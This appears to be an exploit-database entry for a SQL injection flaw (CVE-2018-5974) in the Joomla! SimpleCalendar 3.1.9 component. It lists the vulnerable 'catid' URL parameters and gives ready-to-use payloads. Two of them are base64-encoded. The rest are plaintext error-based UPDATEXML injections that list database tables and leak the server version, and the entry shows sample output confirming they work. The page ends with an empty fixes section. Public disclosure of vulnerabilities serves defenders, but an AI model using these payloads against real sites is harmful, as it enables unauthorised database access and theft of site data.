Joomla! Component SimpleCalendar 3.1.9 - SQL Injection

2018-02-16 02:05:15

# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5
#
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
#
# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp
#
# # # #

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=(UPDATEXML(0,/*!01111CONCAT*/(0x2e,version(),0x7e7e7e7e,(SELECT (ELT(66=66,1))),database()),2925))
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'

Fixes

No fixes

In order to submit a new fix you need to be registered.